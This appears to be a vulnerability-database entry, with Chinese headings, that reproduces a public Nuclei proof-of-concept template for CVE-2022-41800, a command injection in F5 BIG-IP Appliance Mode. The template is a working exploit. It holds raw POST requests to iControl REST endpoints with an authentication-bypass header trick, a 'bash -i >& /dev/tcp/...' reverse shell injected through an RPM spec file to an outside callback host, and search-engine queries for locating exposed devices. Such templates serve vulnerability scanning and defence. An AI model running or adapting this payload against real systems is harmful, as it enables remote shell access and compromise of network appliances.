漏洞描述
When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
CVE-2022-41800: F5 BIG-IP Appliance Mode - Command Injection
PoC代码[已公开]
id: CVE-2022-41800
info:
name: F5 BIG-IP Appliance Mode - Command Injection
author: dwisiswant0
severity: high
description: |
When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
impact: |
A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388).
reference:
- https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis
- https://support.f5.com/csp/article/K97843387
- https://support.f5.com/csp/article/K13325942
- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
- https://nvd.nist.gov/vuln/detail/cve-2022-41800
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
cvss-score: 8.7
cve-id: CVE-2022-41800
cwe-id: CWE-77
epss-score: 0.92837
epss-percentile: 0.99755
cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: f5
product: big-ip_access_policy_manager
shodan-query:
- http.title:"big-ip®-+redirect" +"server"
- http.html:"big-ip apm"
fofa-query:
- body="big-ip apm"
- title="big-ip®-+redirect" +"server"
google-query: intitle:"big-ip®-+redirect" +"server"
tags: cve,cve2022,rce,f5,bigip,instrusive
variables:
auth: "admin:{{rand_text_alpha(1)}}"
rand_app: "{{to_lower(rand_text_alpha(6))}}"
rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
http:
- raw:
- |
POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
Host: {{Hostname}}
X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
Authorization: Basic {{base64(auth)}}
Content-Type: application/json
Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
{
"specFileData": {
"name": "{{rand_app}}",
"srcBasePath": "/tmp",
"version": "{{rand_ver}}",
"release": "{{rand_rel}}",
"description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1",
"summary": "{{to_lower(rand_text_alphanumeric(10))}}"
}
}
- |
POST /mgmt/shared/iapp/build-package HTTP/1.1
Host: {{Hostname}}
X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
Authorization: Basic {{base64(auth)}}
Content-Type: application/json
Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
{
"state": {},
"appName": "{{rand_app}}",
"packageDirectory": "/tmp",
"specFilePath": "{{spec}}",
"force": true
}
extractors:
- type: json
part: body
name: spec
json:
- ".specFilePath"
internal: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "RUN_BUILD_RPM_TASK"
- "shared:iapp:build-package:buildrpmtaskstate"
# digest: 4b0a00483046022100c297bfec6bc826beca8496e8d14f09815dc2697ecf2b1bee2ef5e8e190a29cfb022100ae1f38f0eecae3364faff7c31faf59272247fcf8cb30ad3dabf61243199ddffb:922c64590222798bb761d5b6d8e72950